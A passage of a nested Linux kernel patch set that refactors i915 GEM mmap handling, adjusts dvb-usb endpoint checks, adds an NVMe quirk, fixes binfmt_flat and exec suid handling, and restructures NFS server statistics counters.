+ #define MIN_CHUNK_PAGES (SZ_1M >> PAGE_SHIFT)
+@@ -302,14 +337,18 @@ static vm_fault_t vm_fault_gtt(struct vm_fault *vmf)
+ 	struct i915_ggtt *ggtt = to_gt(i915)->ggtt;
+ 	bool write = area->vm_flags & VM_WRITE;
+ 	struct i915_gem_ww_ctx ww;
++	unsigned long obj_offset;
++	unsigned long start, end; /* memory boundaries */
+ 	intel_wakeref_t wakeref;
+ 	struct i915_vma *vma;
+ 	pgoff_t page_offset;
++	unsigned long pfn;
+ 	int srcu;
+ 	int ret;
+ 
+-	/* We don't use vmf->pgoff since that has the fake offset */
++	obj_offset = area->vm_pgoff - drm_vma_node_start(&mmo->vma_node);
+ 	page_offset = (vmf->address - area->vm_start) >> PAGE_SHIFT;
++	page_offset += obj_offset;
+ 
+ 	trace_i915_gem_object_fault(obj, page_offset, true, write);
+ 
+@@ -393,12 +432,14 @@ static vm_fault_t vm_fault_gtt(struct vm_fault *vmf)
+ 	if (ret)
+ 		goto err_unpin;
+ 
++	set_address_limits(area, vma, obj_offset, &start, &end);
++
++	pfn = (ggtt->gmadr.start + i915_ggtt_offset(vma)) >> PAGE_SHIFT;
++	pfn += (start - area->vm_start) >> PAGE_SHIFT;
++	pfn += obj_offset - vma->gtt_view.partial.offset;
++
+ 	/* Finally, remap it using the new GTT offset */
+-	ret = remap_io_mapping(area,
+-			       area->vm_start + (vma->gtt_view.partial.offset << PAGE_SHIFT),
+-			       (ggtt->gmadr.start + vma->node.start) >> PAGE_SHIFT,
+-			       min_t(u64, vma->size, area->vm_end - area->vm_start),
+-			       &ggtt->iomap);
++	ret = remap_io_mapping(area, start, pfn, end - start, &ggtt->iomap);
+ 	if (ret)
+ 		goto err_fence;
+ 
+@@ -928,53 +969,15 @@ static struct file *mmap_singleton(struct drm_i915_private *i915)
+ 	return file;
+ }
+ 
+-/*
+- * This overcomes the limitation in drm_gem_mmap's assignment of a
+- * drm_gem_object as the vma->vm_private_data. Since we need to
+- * be able to resolve multiple mmap offsets which could be tied
+- * to a single gem object.
+- */
+-int i915_gem_mmap(struct file *filp, struct vm_area_struct *vma)
++static int
++i915_gem_object_mmap(struct drm_i915_gem_object *obj,
++		     struct i915_mmap_offset *mmo,
++		     struct vm_area_struct *vma)
+ {
+-	struct drm_vma_offset_node *node;
+-	struct drm_file *priv = filp->private_data;
+-	struct drm_device *dev = priv->minor->dev;
+-	struct drm_i915_gem_object *obj = NULL;
+-	struct i915_mmap_offset *mmo = NULL;
++	struct drm_i915_private *i915 = to_i915(obj->base.dev);
++	struct drm_device *dev = &i915->drm;
+ 	struct file *anon;
+ 
+-	if (drm_dev_is_unplugged(dev))
+-		return -ENODEV;
+-
+-	rcu_read_lock();
+-	drm_vma_offset_lock_lookup(dev->vma_offset_manager);
+-	node = drm_vma_offset_exact_lookup_locked(dev->vma_offset_manager,
+-						  vma->vm_pgoff,
+-						  vma_pages(vma));
+-	if (node && drm_vma_node_is_allowed(node, priv)) {
+-		/*
+-		 * Skip 0-refcnted objects as it is in the process of being
+-		 * destroyed and will be invalid when the vma manager lock
+-		 * is released.
+-		 */
+-		if (!node->driver_private) {
+-			mmo = container_of(node, struct i915_mmap_offset, vma_node);
+-			obj = i915_gem_object_get_rcu(mmo->obj);
+-
+-			GEM_BUG_ON(obj && obj->ops->mmap_ops);
+-		} else {
+-			obj = i915_gem_object_get_rcu
+-				(container_of(node, struct drm_i915_gem_object,
+-					      base.vma_node));
+-
+-			GEM_BUG_ON(obj && !obj->ops->mmap_ops);
+-		}
+-	}
+-	drm_vma_offset_unlock_lookup(dev->vma_offset_manager);
+-	rcu_read_unlock();
+-	if (!obj)
+-		return node ? -EACCES : -EINVAL;
+-
+ 	if (i915_gem_object_is_readonly(obj)) {
+ 		if (vma->vm_flags & VM_WRITE) {
+ 			i915_gem_object_put(obj);
+@@ -1006,7 +1009,7 @@ int i915_gem_mmap(struct file *filp, struct vm_area_struct *vma)
+ 	if (obj->ops->mmap_ops) {
+ 		vma->vm_page_prot = pgprot_decrypted(vm_get_page_prot(vma->vm_flags));
+ 		vma->vm_ops = obj->ops->mmap_ops;
+-		vma->vm_private_data = node->driver_private;
++		vma->vm_private_data = obj->base.vma_node.driver_private;
+ 		return 0;
+ 	}
+ 
+@@ -1044,6 +1047,93 @@ int i915_gem_mmap(struct file *filp, struct vm_area_struct *vma)
+ 	return 0;
+ }
+ 
++/*
++ * This overcomes the limitation in drm_gem_mmap's assignment of a
++ * drm_gem_object as the vma->vm_private_data. Since we need to
++ * be able to resolve multiple mmap offsets which could be tied
++ * to a single gem object.
++ */
++int i915_gem_mmap(struct file *filp, struct vm_area_struct *vma)
++{
++	struct drm_vma_offset_node *node;
++	struct drm_file *priv = filp->private_data;
++	struct drm_device *dev = priv->minor->dev;
++	struct drm_i915_gem_object *obj = NULL;
++	struct i915_mmap_offset *mmo = NULL;
++
++	if (drm_dev_is_unplugged(dev))
++		return -ENODEV;
++
++	rcu_read_lock();
++	drm_vma_offset_lock_lookup(dev->vma_offset_manager);
++	node = drm_vma_offset_exact_lookup_locked(dev->vma_offset_manager,
++						  vma->vm_pgoff,
++						  vma_pages(vma));
++	if (node && drm_vma_node_is_allowed(node, priv)) {
++		/*
++		 * Skip 0-refcnted objects as it is in the process of being
++		 * destroyed and will be invalid when the vma manager lock
++		 * is released.
++		 */
++		if (!node->driver_private) {
++			mmo = container_of(node, struct i915_mmap_offset, vma_node);
++			obj = i915_gem_object_get_rcu(mmo->obj);
++
++			GEM_BUG_ON(obj && obj->ops->mmap_ops);
++		} else {
++			obj = i915_gem_object_get_rcu
++				(container_of(node, struct drm_i915_gem_object,
++					      base.vma_node));
++
++			GEM_BUG_ON(obj && !obj->ops->mmap_ops);
++		}
++	}
++	drm_vma_offset_unlock_lookup(dev->vma_offset_manager);
++	rcu_read_unlock();
++	if (!obj)
++		return node ? -EACCES : -EINVAL;
++
++	return i915_gem_object_mmap(obj, mmo, vma);
++}
++
++int i915_gem_fb_mmap(struct drm_i915_gem_object *obj, struct vm_area_struct *vma)
++{
++	struct drm_i915_private *i915 = to_i915(obj->base.dev);
++	struct drm_device *dev = &i915->drm;
++	struct i915_mmap_offset *mmo = NULL;
++	enum i915_mmap_type mmap_type;
++	struct i915_ggtt *ggtt = to_gt(i915)->ggtt;
++
++	if (drm_dev_is_unplugged(dev))
++		return -ENODEV;
++
++	/* handle ttm object */
++	if (obj->ops->mmap_ops) {
++		/*
++		 * ttm fault handler, ttm_bo_vm_fault_reserved() uses fake offset
++		 * to calculate page offset so set that up.
++		 */
++		vma->vm_pgoff += drm_vma_node_start(&obj->base.vma_node);
++	} else {
++		/* handle stolen and smem objects */
++		mmap_type = i915_ggtt_has_aperture(ggtt) ? I915_MMAP_TYPE_GTT : I915_MMAP_TYPE_WC;
++		mmo = mmap_offset_attach(obj, mmap_type, NULL);
++		if (IS_ERR(mmo))
++			return PTR_ERR(mmo);
++
++		vma->vm_pgoff += drm_vma_node_start(&mmo->vma_node);
++	}
++
++	/*
++	 * When we install vm_ops for mmap we are too late for
++	 * the vm_ops->open() which increases the ref_count of
++	 * this obj and then it gets decreased by the vm_ops->close().
++	 * To balance this increase the obj ref_count here.
++	 */
++	obj = i915_gem_object_get(obj);
++	return i915_gem_object_mmap(obj, mmo, vma);
++}
++
+ #if IS_ENABLED(CONFIG_DRM_I915_SELFTEST)
+ #include "selftests/i915_gem_mman.c"
+ #endif
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_mman.h b/drivers/gpu/drm/i915/gem/i915_gem_mman.h
+index 1fa91b3033b35a..196417fd0f5c41 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_mman.h
++++ b/drivers/gpu/drm/i915/gem/i915_gem_mman.h
+@@ -29,5 +29,5 @@ void i915_gem_object_release_mmap_gtt(struct drm_i915_gem_object *obj);
+ 
+ void i915_gem_object_runtime_pm_release_mmap_offset(struct drm_i915_gem_object *obj);
+ void i915_gem_object_release_mmap_offset(struct drm_i915_gem_object *obj);
+-
++int i915_gem_fb_mmap(struct drm_i915_gem_object *obj, struct vm_area_struct *vma);
+ #endif
+diff --git a/drivers/media/usb/dvb-usb/dvb-usb-init.c b/drivers/media/usb/dvb-usb/dvb-usb-init.c
+index 6cf6d08cc4ec91..58eea8ab547791 100644
+--- a/drivers/media/usb/dvb-usb/dvb-usb-init.c
++++ b/drivers/media/usb/dvb-usb/dvb-usb-init.c
+@@ -23,40 +23,11 @@ static int dvb_usb_force_pid_filter_usage;
+ module_param_named(force_pid_filter_usage, dvb_usb_force_pid_filter_usage, int, 0444);
+ MODULE_PARM_DESC(force_pid_filter_usage, "force all dvb-usb-devices to use a PID filter, if any (default: 0).");
+ 
+-static int dvb_usb_check_bulk_endpoint(struct dvb_usb_device *d, u8 endpoint)
+-{
+-	if (endpoint) {
+-		int ret;
+-
+-		ret = usb_pipe_type_check(d->udev, usb_sndbulkpipe(d->udev, endpoint));
+-		if (ret)
+-			return ret;
+-		ret = usb_pipe_type_check(d->udev, usb_rcvbulkpipe(d->udev, endpoint));
+-		if (ret)
+-			return ret;
+-	}
+-	return 0;
+-}
+-
+-static void dvb_usb_clear_halt(struct dvb_usb_device *d, u8 endpoint)
+-{
+-	if (endpoint) {
+-		usb_clear_halt(d->udev, usb_sndbulkpipe(d->udev, endpoint));
+-		usb_clear_halt(d->udev, usb_rcvbulkpipe(d->udev, endpoint));
+-	}
+-}
+-
+ static int dvb_usb_adapter_init(struct dvb_usb_device *d, short *adapter_nrs)
+ {
+ 	struct dvb_usb_adapter *adap;
+ 	int ret, n, o;
+ 
+-	ret = dvb_usb_check_bulk_endpoint(d, d->props.generic_bulk_ctrl_endpoint);
+-	if (ret)
+-		return ret;
+-	ret = dvb_usb_check_bulk_endpoint(d, d->props.generic_bulk_ctrl_endpoint_response);
+-	if (ret)
+-		return ret;
+ 	for (n = 0; n < d->props.num_adapters; n++) {
+ 		adap = &d->adapter[n];
+ 		adap->dev = d;
+@@ -132,8 +103,10 @@ static int dvb_usb_adapter_init(struct dvb_usb_device *d, short *adapter_nrs)
+ 	 * when reloading the driver w/o replugging the device
+ 	 * sometimes a timeout occurs, this helps
+ 	 */
+-	dvb_usb_clear_halt(d, d->props.generic_bulk_ctrl_endpoint);
+-	dvb_usb_clear_halt(d, d->props.generic_bulk_ctrl_endpoint_response);
++	if (d->props.generic_bulk_ctrl_endpoint != 0) {
++		usb_clear_halt(d->udev, usb_sndbulkpipe(d->udev, d->props.generic_bulk_ctrl_endpoint));
++		usb_clear_halt(d->udev, usb_rcvbulkpipe(d->udev, d->props.generic_bulk_ctrl_endpoint));
++	}
+ 
+ 	return 0;
+ 
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 6f648b58cbd4da..c309709ac9b55a 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3109,6 +3109,13 @@ static unsigned long check_vendor_combination_bug(struct pci_dev *pdev)
+ 			return NVME_QUIRK_FORCE_NO_SIMPLE_SUSPEND;
+ 	}
+ 
++	/*
++	 * NVMe SSD drops off the PCIe bus after system idle
++	 * for 10 hours on a Lenovo N60z board.
++	 */
++	if (dmi_match(DMI_BOARD_NAME, "LXKT-ZXEG-N6"))
++		return NVME_QUIRK_NO_APST;
++
+ 	return 0;
+ }
+ 
+diff --git a/fs/binfmt_flat.c b/fs/binfmt_flat.c
+index c26545d71d39a3..cd6d5bbb4b9df5 100644
+--- a/fs/binfmt_flat.c
++++ b/fs/binfmt_flat.c
+@@ -72,8 +72,10 @@
+ 
+ #ifdef CONFIG_BINFMT_FLAT_NO_DATA_START_OFFSET
+ #define DATA_START_OFFSET_WORDS		(0)
++#define MAX_SHARED_LIBS_UPDATE		(0)
+ #else
+ #define DATA_START_OFFSET_WORDS		(MAX_SHARED_LIBS)
++#define MAX_SHARED_LIBS_UPDATE		(MAX_SHARED_LIBS)
+ #endif
+ 
+ struct lib_info {
+@@ -880,7 +882,7 @@ static int load_flat_binary(struct linux_binprm *bprm)
+ 		return res;
+ 
+ 	/* Update data segment pointers for all libraries */
+-	for (i = 0; i < MAX_SHARED_LIBS; i++) {
++	for (i = 0; i < MAX_SHARED_LIBS_UPDATE; i++) {
+ 		if (!libinfo.lib_list[i].loaded)
+ 			continue;
+ 		for (j = 0; j < MAX_SHARED_LIBS; j++) {
+diff --git a/fs/exec.c b/fs/exec.c
+index b01434d6a512de..481b6e7df6ae50 100644
+--- a/fs/exec.c
++++ b/fs/exec.c
+@@ -1603,6 +1603,7 @@ static void bprm_fill_uid(struct linux_binprm *bprm, struct file *file)
+ 	unsigned int mode;
+ 	kuid_t uid;
+ 	kgid_t gid;
++	int err;
+ 
+ 	if (!mnt_may_suid(file->f_path.mnt))
+ 		return;
+@@ -1619,12 +1620,17 @@ static void bprm_fill_uid(struct linux_binprm *bprm, struct file *file)
+ 	/* Be careful if suid/sgid is set */
+ 	inode_lock(inode);
+ 
+-	/* reload atomically mode/uid/gid now that lock held */
++	/* Atomically reload and check mode/uid/gid now that lock held. */
+ 	mode = inode->i_mode;
+ 	uid = i_uid_into_mnt(mnt_userns, inode);
+ 	gid = i_gid_into_mnt(mnt_userns, inode);
++	err = inode_permission(mnt_userns, inode, MAY_EXEC);
+ 	inode_unlock(inode);
+ 
++	/* Did the exec bit vanish out from under us? Give up. */
++	if (err)
++		return;
++
+ 	/* We ignore suid/sgid if there are no mappings for them in the ns */
+ 	if (!kuid_has_mapping(bprm->cred->user_ns, uid) ||
+ 		 !kgid_has_mapping(bprm->cred->user_ns, gid))
+diff --git a/fs/lockd/svc.c b/fs/lockd/svc.c
+index 5579e67da17dbf..c33f78513f00f5 100644
+--- a/fs/lockd/svc.c
++++ b/fs/lockd/svc.c
+@@ -759,8 +759,6 @@ static const struct svc_version *nlmsvc_version[] = {
+ #endif
+ };
+ 
+-static struct svc_stat		nlmsvc_stats;
+-
+ #define NLM_NRVERS	ARRAY_SIZE(nlmsvc_version)
+ static struct svc_program	nlmsvc_program = {
+ 	.pg_prog		= NLM_PROGRAM,		/* program number */
+@@ -768,7 +766,6 @@ static struct svc_program	nlmsvc_program = {
+ 	.pg_vers		= nlmsvc_version,	/* version table */
+ 	.pg_name		= "lockd",		/* service name */
+ 	.pg_class		= "nfsd",		/* share authentication with nfsd */
+-	.pg_stats		= &nlmsvc_stats,	/* stats table */
+ 	.pg_authenticate	= &lockd_authenticate,	/* export authentication */
+ 	.pg_init_request	= svc_generic_init_request,
+ 	.pg_rpcbind_set		= svc_generic_rpcbind_set,
+diff --git a/fs/nfs/callback.c b/fs/nfs/callback.c
+index 46a0a2d6962e1c..e6445b556ce1c4 100644
+--- a/fs/nfs/callback.c
++++ b/fs/nfs/callback.c
+@@ -407,15 +407,12 @@ static const struct svc_version *nfs4_callback_version[] = {
+ 	[4] = &nfs4_callback_version4,
+ };
+ 
+-static struct svc_stat nfs4_callback_stats;
+-
+ static struct svc_program nfs4_callback_program = {
+ 	.pg_prog = NFS4_CALLBACK,			/* RPC service number */
+ 	.pg_nvers = ARRAY_SIZE(nfs4_callback_version),	/* Number of entries */
+ 	.pg_vers = nfs4_callback_version,		/* version table */
+ 	.pg_name = "NFSv4 callback",			/* service name */
+ 	.pg_class = "nfs",				/* authentication class */
+-	.pg_stats = &nfs4_callback_stats,
+ 	.pg_authenticate = nfs_callback_authenticate,
+ 	.pg_init_request = svc_generic_init_request,
+ 	.pg_rpcbind_set	= svc_generic_rpcbind_set,
+diff --git a/fs/nfsd/export.c b/fs/nfsd/export.c
+index 668c7527b17e81..16fadade86ccbc 100644
+--- a/fs/nfsd/export.c
++++ b/fs/nfsd/export.c
+@@ -339,12 +339,16 @@ static int export_stats_init(struct export_stats *stats)
+ 
+ static void export_stats_reset(struct export_stats *stats)
+ {
+-	nfsd_percpu_counters_reset(stats->counter, EXP_STATS_COUNTERS_NUM);
++	if (stats)
++		nfsd_percpu_counters_reset(stats->counter,
++					   EXP_STATS_COUNTERS_NUM);
+ }
+ 
+ static void export_stats_destroy(struct export_stats *stats)
+ {
+-	nfsd_percpu_counters_destroy(stats->counter, EXP_STATS_COUNTERS_NUM);
++	if (stats)
++		nfsd_percpu_counters_destroy(stats->counter,
++					     EXP_STATS_COUNTERS_NUM);
+ }
+ 
+ static void svc_export_put(struct kref *ref)
+@@ -353,7 +357,8 @@ static void svc_export_put(struct kref *ref)
+ 	path_put(&exp->ex_path);
+ 	auth_domain_put(exp->ex_client);
+ 	nfsd4_fslocs_free(&exp->ex_fslocs);
+-	export_stats_destroy(&exp->ex_stats);
++	export_stats_destroy(exp->ex_stats);
++	kfree(exp->ex_stats);
+ 	kfree(exp->ex_uuid);
+ 	kfree_rcu(exp, ex_rcu);
+ }
+@@ -744,13 +749,15 @@ static int svc_export_show(struct seq_file *m,
+ 	seq_putc(m, '\t');
+ 	seq_escape(m, exp->ex_client->name, " \t\n\\");
+ 	if (export_stats) {
+-		seq_printf(m, "\t%lld\n", exp->ex_stats.start_time);
++		struct percpu_counter *counter = exp->ex_stats->counter;
++
++		seq_printf(m, "\t%lld\n", exp->ex_stats->start_time);
+ 		seq_printf(m, "\tfh_stale: %lld\n",
+-			   percpu_counter_sum_positive(&exp->ex_stats.counter[EXP_STATS_FH_STALE]));
++			   percpu_counter_sum_positive(&counter[EXP_STATS_FH_STALE]));
+ 		seq_printf(m, "\tio_read: %lld\n",
+-			   percpu_counter_sum_positive(&exp->ex_stats.counter[EXP_STATS_IO_READ]));
++			   percpu_counter_sum_positive(&counter[EXP_STATS_IO_READ]));
+ 		seq_printf(m, "\tio_write: %lld\n",
+-			   percpu_counter_sum_positive(&exp->ex_stats.counter[EXP_STATS_IO_WRITE]));
++			   percpu_counter_sum_positive(&counter[EXP_STATS_IO_WRITE]));
+ 		seq_putc(m, '\n');
+ 		return 0;
+ 	}
+@@ -796,7 +803,7 @@ static void svc_export_init(struct cache_head *cnew, struct cache_head *citem)
+ 	new->ex_layout_types = 0;
+ 	new->ex_uuid = NULL;
+ 	new->cd = item->cd;
+-	export_stats_reset(&new->ex_stats);
++	export_stats_reset(new->ex_stats);
+ }
+ 
+ static void export_update(struct cache_head *cnew, struct cache_head *citem)
+@@ -832,7 +839,14 @@ static struct cache_head *svc_export_alloc(void)
+ 	if (!i)
+ 		return NULL;
+ 
+-	if (export_stats_init(&i->ex_stats)) {
++	i->ex_stats = kmalloc(sizeof(*(i->ex_stats)), GFP_KERNEL);
++	if (!i->ex_stats) {
++		kfree(i);
++		return NULL;
++	}
++
++	if (export_stats_init(i->ex_stats)) {
++		kfree(i->ex_stats);
+ 		kfree(i);
+ 		return NULL;
+ 	}
+diff --git a/fs/nfsd/export.h b/fs/nfsd/export.h
+index d03f7f6a8642d3..f73e23bb24a1ea 100644
+--- a/fs/nfsd/export.h
++++ b/fs/nfsd/export.h
+@@ -64,10 +64,10 @@ struct svc_export {
+ 	struct cache_head	h;
+ 	struct auth_domain *	ex_client;
+ 	int			ex_flags;
++	int			ex_fsid;
+ 	struct path		ex_path;
+ 	kuid_t			ex_anon_uid;
+ 	kgid_t			ex_anon_gid;
+-	int			ex_fsid;
+ 	unsigned char *		ex_uuid; /* 16 byte fsid */
+ 	struct nfsd4_fs_locations ex_fslocs;
+ 	uint32_t		ex_nflavors;
+@@ -76,7 +76,7 @@ struct svc_export {
+ 	struct nfsd4_deviceid_map *ex_devid_map;
+ 	struct cache_detail	*cd;
+ 	struct rcu_head		ex_rcu;
+-	struct export_stats	ex_stats;
++	struct export_stats	*ex_stats;
+ };
+ 
+ /* an "export key" (expkey) maps a filehandlefragement to an
+diff --git a/fs/nfsd/netns.h b/fs/nfsd/netns.h
+index 51a4b7885cae2a..548422b24a7d78 100644
+--- a/fs/nfsd/netns.h
++++ b/fs/nfsd/netns.h
+@@ -10,8 +10,10 @@
+ 
+ #include <net/net_namespace.h>
+ #include <net/netns/generic.h>
++#include <linux/nfs4.h>
+ #include <linux/percpu_counter.h>
+ #include <linux/siphash.h>
++#include <linux/sunrpc/stats.h>
+ 
+ /* Hash tables for nfs4_clientid state */
+ #define CLIENT_HASH_BITS                 4
+@@ -25,10 +27,22 @@ struct nfsd4_client_tracking_ops;
+ 
+ enum {
+ 	/* cache misses due only to checksum comparison failures */
+-	NFSD_NET_PAYLOAD_MISSES,
++	NFSD_STATS_PAYLOAD_MISSES,
+ 	/* amount of memory (in bytes) currently consumed by the DRC */
+-	NFSD_NET_DRC_MEM_USAGE,
+-	NFSD_NET_COUNTERS_NUM
++	NFSD_STATS_DRC_MEM_USAGE,
++	NFSD_STATS_RC_HITS,		/* repcache hits */
++	NFSD_STATS_RC_MISSES,		/* repcache misses */
++	NFSD_STATS_RC_NOCACHE,		/* uncached reqs */
++	NFSD_STATS_FH_STALE,		/* FH stale error */
++	NFSD_STATS_IO_READ,		/* bytes returned to read requests */
++	NFSD_STATS_IO_WRITE,		/* bytes passed in write requests */
++#ifdef CONFIG_NFSD_V4
++	NFSD_STATS_FIRST_NFS4_OP,	/* count of individual nfsv4 operations */
++	NFSD_STATS_LAST_NFS4_OP = NFSD_STATS_FIRST_NFS4_OP + LAST_NFS4_OP,
++#define NFSD_STATS_NFS4_OP(op)	(NFSD_STATS_FIRST_NFS4_OP + (op))
++	NFSD_STATS_WDELEG_GETATTR,	/* count of getattr conflict with wdeleg */
++#endif
++	NFSD_STATS_COUNTERS_NUM
+ };
+ 
+ /*
+@@ -168,7 +182,10 @@ struct nfsd_net {
+ 	atomic_t                 num_drc_entries;
+ 
+ 	/* Per-netns stats counters */
+-	struct percpu_counter    counter[NFSD_NET_COUNTERS_NUM];
++	struct percpu_counter    counter[NFSD_STATS_COUNTERS_NUM];
++
++	/* sunrpc svc stats */
++	struct svc_stat          nfsd_svcstats;
+ 
+ 	/* longest hash chain seen */
+ 	unsigned int             longest_chain;
+diff --git a/fs/nfsd/nfs4proc.c b/fs/nfsd/nfs4proc.c
+index b6d768bd5ccca4..7451cd34710d08 100644
+--- a/fs/nfsd/nfs4proc.c
++++ b/fs/nfsd/nfs4proc.c
+@@ -2430,10 +2430,10 @@ nfsd4_proc_null(struct svc_rqst *rqstp)
+ 	return rpc_success;
+ }
+ 
+-static inline void nfsd4_increment_op_stats(u32 opnum)
++static inline void nfsd4_increment_op_stats(struct nfsd_net *nn, u32 opnum)
+ {
+ 	if (opnum >= FIRST_NFS4_OP && opnum <= LAST_NFS4_OP)
+-		percpu_counter_inc(&nfsdstats.counter[NFSD_STATS_NFS4_OP(opnum)]);
++		percpu_counter_inc(&nn->counter[NFSD_STATS_NFS4_OP(opnum)]);
+ }
+ 
+ static const struct nfsd4_operation nfsd4_ops[];
+@@ -2708,7 +2708,7 @@ nfsd4_proc_compound(struct svc_rqst *rqstp)
+ 					   status, nfsd4_op_name(op->opnum));
+ 
+ 		nfsd4_cstate_clear_replay(cstate);
+-		nfsd4_increment_op_stats(op->opnum);
++		nfsd4_increment_op_stats(nn, op->opnum);
+ 	}
+ 
+ 	fh_put(current_fh);
+diff --git a/fs/nfsd/nfscache.c b/fs/nfsd/nfscache.c
+index f53335ae0ab228..50ed64a5155142 100644
+--- a/fs/nfsd/nfscache.c
++++ b/fs/nfsd/nfscache.c
+@@ -85,8 +85,8 @@ nfsd_hashsize(unsigned int limit)
+ }
+ 
+ static struct svc_cacherep *
+-nfsd_reply_cache_alloc(struct svc_rqst *rqstp, __wsum csum,
+-			struct nfsd_net *nn)
++nfsd_cacherep_alloc(struct svc_rqst *rqstp, __wsum csum,
++		    struct nfsd_net *nn)
+ {
+ 	struct svc_cacherep	*rp;
+ 
+@@ -110,21 +110,48 @@ nfsd_reply_cache_alloc(struct svc_rqst *rqstp, __wsum csum,
+ 	return rp;
+ }
+ 
+-static void
+-nfsd_reply_cache_free_locked(struct nfsd_drc_bucket *b, struct svc_cacherep *rp,
+-				struct nfsd_net *nn)
++static void nfsd_cacherep_free(struct svc_cacherep *rp)
+ {
+-	if (rp->c_type == RC_REPLBUFF && rp->c_replvec.iov_base) {
+-		nfsd_stats_drc_mem_usage_sub(nn, rp->c_replvec.iov_len);
++	if (rp->c_type == RC_REPLBUFF)
+ 		kfree(rp->c_replvec.iov_base);
++	kmem_cache_free(drc_slab, rp);
++}
++
++static unsigned long
++nfsd_cacherep_dispose(struct list_head *dispose)
++{
++	struct svc_cacherep *rp;
++	unsigned long freed = 0;
++
++	while (!list_empty(dispose)) {
++		rp = list_first_entry(dispose, struct svc_cacherep, c_lru);
++		list_del(&rp->c_lru);
++		nfsd_cacherep_free(rp);
++		freed++;
+ 	}
++	return freed;
++}
++
++static void
++nfsd_cacherep_unlink_locked(struct nfsd_net *nn, struct nfsd_drc_bucket *b,
++			    struct svc_cacherep *rp)
++{
++	if (rp->c_type == RC_REPLBUFF && rp->c_replvec.iov_base)
++		nfsd_stats_drc_mem_usage_sub(nn, rp->c_replvec.iov_len);
+ 	if (rp->c_state != RC_UNUSED) {
+ 		rb_erase(&rp->c_node, &b->rb_head);
+ 		list_del(&rp->c_lru);
+ 		atomic_dec(&nn->num_drc_entries);
+ 		nfsd_stats_drc_mem_usage_sub(nn, sizeof(*rp));
+ 	}
+-	kmem_cache_free(drc_slab, rp);
++}
++
++static void
++nfsd_reply_cache_free_locked(struct nfsd_drc_bucket *b, struct svc_cacherep *rp,
++				struct nfsd_net *nn)
++{
++	nfsd_cacherep_unlink_locked(nn, b, rp);
++	nfsd_cacherep_free(rp);
+ }
+ 
+ static void
+@@ -132,8 +159,9 @@ nfsd_reply_cache_free(struct nfsd_drc_bucket *b, struct svc_cacherep *rp,
+ 			struct nfsd_net *nn)
+ {
+ 	spin_lock(&b->cache_lock);
+-	nfsd_reply_cache_free_locked(b, rp, nn);
++	nfsd_cacherep_unlink_locked(nn, b, rp);
+ 	spin_unlock(&b->cache_lock);
++	nfsd_cacherep_free(rp);
+ }
+ 
+ int nfsd_drc_slab_create(void)
+@@ -148,16 +176,6 @@ void nfsd_drc_slab_free(void)
+ 	kmem_cache_destroy(drc_slab);
+ }
+ 
+-static int nfsd_reply_cache_stats_init(struct nfsd_net *nn)
+-{
+-	return nfsd_percpu_counters_init(nn->counter, NFSD_NET_COUNTERS_NUM);
+-}
+-
+-static void nfsd_reply_cache_stats_destroy(struct nfsd_net *nn)
+-{
+-	nfsd_percpu_counters_destroy(nn->counter, NFSD_NET_COUNTERS_NUM);
+-}
+-
+ int nfsd_reply_cache_init(struct nfsd_net *nn)
+ {
+ 	unsigned int hashsize;
+@@ -169,17 +187,13 @@ int nfsd_reply_cache_init(struct nfsd_net *nn)
+ 	hashsize = nfsd_hashsize(nn->max_drc_entries);
+ 	nn->maskbits = ilog2(hashsize);
+ 
+-	status = nfsd_reply_cache_stats_init(nn);
+-	if (status)
+-		goto out_nomem;
+-
+ 	nn->nfsd_reply_cache_shrinker.scan_objects = nfsd_reply_cache_scan;
+ 	nn->nfsd_reply_cache_shrinker.count_objects = nfsd_reply_cache_count;
+ 	nn->nfsd_reply_cache_shrinker.seeks = 1;
+ 	status = register_shrinker(&nn->nfsd_reply_cache_shrinker,
+ 				   "nfsd-reply:%s", nn->nfsd_name);
+ 	if (status)
+-		goto out_stats_destroy;
++		return status;
+ 
+ 	nn->drc_hashtbl = kvzalloc(array_size(hashsize,
+ 				sizeof(*nn->drc_hashtbl)), GFP_KERNEL);
+@@ -195,9 +209,6 @@ int nfsd_reply_cache_init(struct nfsd_net *nn)
+ 	return 0;
+ out_shrinker:
+ 	unregister_shrinker(&nn->nfsd_reply_cache_shrinker);
+-out_stats_destroy:
+-	nfsd_reply_cache_stats_destroy(nn);
+-out_nomem:
+ 	printk(KERN_ERR "nfsd: failed to allocate reply cache\n");
+ 	return -ENOMEM;
+ }
+@@ -217,7 +228,6 @@ void nfsd_reply_cache_shutdown(struct nfsd_net *nn)
+ 									rp, nn);
+ 		}
+ 	}
+-	nfsd_reply_cache_stats_destroy(nn);
+ 
+ 	kvfree(nn->drc_hashtbl);
+ 	nn->drc_hashtbl = NULL;
+@@ -244,12 +254,21 @@ nfsd_cache_bucket_find(__be32 xid, struct nfsd_net *nn)
+ 	return &nn->drc_hashtbl[hash];
+ }
+ 
+-static long prune_bucket(struct nfsd_drc_bucket *b, struct nfsd_net *nn,
+-			 unsigned int max)
++/*
++ * Remove and return no more than @max expired entries in bucket @b.
++ * If @max is zero, do not limit the number of removed entries.
++ */
++static void
++nfsd_prune_bucket_locked(struct nfsd_net *nn, struct nfsd_drc_bucket *b,
++			 unsigned int max, struct list_head *dispose)
+ {
++	unsigned long expiry = jiffies - RC_EXPIRE;
+ 	struct svc_cacherep *rp, *tmp;
+-	long freed = 0;
++	unsigned int freed = 0;
++
++	lockdep_assert_held(&b->cache_lock);
+ 
++	/* The bucket LRU is ordered oldest-first. */
+ 	list_for_each_entry_safe(rp, tmp, &b->lru_head, c_lru) {
+ 		/*
+ 		 * Don't free entries attached to calls that are still
+@@ -257,43 +276,29 @@ static long prune_bucket(struct nfsd_drc_bucket *b, struct nfsd_net *nn,
+ 		 */
+ 		if (rp->c_state == RC_INPROG)
+ 			continue;
++
+ 		if (atomic_read(&nn->num_drc_entries) <= nn->max_drc_entries &&
+-		    time_before(jiffies, rp->c_timestamp + RC_EXPIRE))
++		    time_before(expiry, rp->c_timestamp))
+ 			break;
+-		nfsd_reply_cache_free_locked(b, rp, nn);
+-		if (max && freed++ > max)
+-			break;
+-	}
+-	return freed;
+-}
+-
+-static long nfsd_prune_bucket(struct nfsd_drc_bucket *b, struct nfsd_net *nn)
+-{
+-	return prune_bucket(b, nn, 3);
+-}
+-
+-/*
+- * Walk the LRU list and prune off entries that are older than RC_EXPIRE.
+- * Also prune the oldest ones when the total exceeds the max number of entries.
+- */
+-static long
